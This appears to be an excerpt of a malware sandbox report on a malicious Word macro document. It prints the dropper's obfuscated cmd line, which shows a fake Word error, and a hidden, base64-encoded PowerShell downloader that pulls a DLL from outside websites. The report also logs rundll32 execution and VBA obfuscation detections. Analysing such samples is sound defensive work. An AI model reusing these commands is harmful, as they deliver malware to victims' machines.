IAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAAC
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogAJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogAJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',KezaJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDubJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggqJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: mscorlib.pdb` source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: ws\mscorlib.pdbpdblib.pdbO source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbE source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2107891055.0000000002820000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbles AA source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: ARCHIVOFile-20-012021.docStream path 'Macros/VBA/Nst6otvnmgmpw' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Nst6otvnmgmpwName: Nst6otvnmgmpw
                      Document contains an embedded VBA with many randomly named variablesShow sources
                      Source: ARCHIVOFile-20-012021.docStream path 'Macros/VBA/Nst6otvnmgmpw' : High entropy of concatenated variable names
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcA
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIA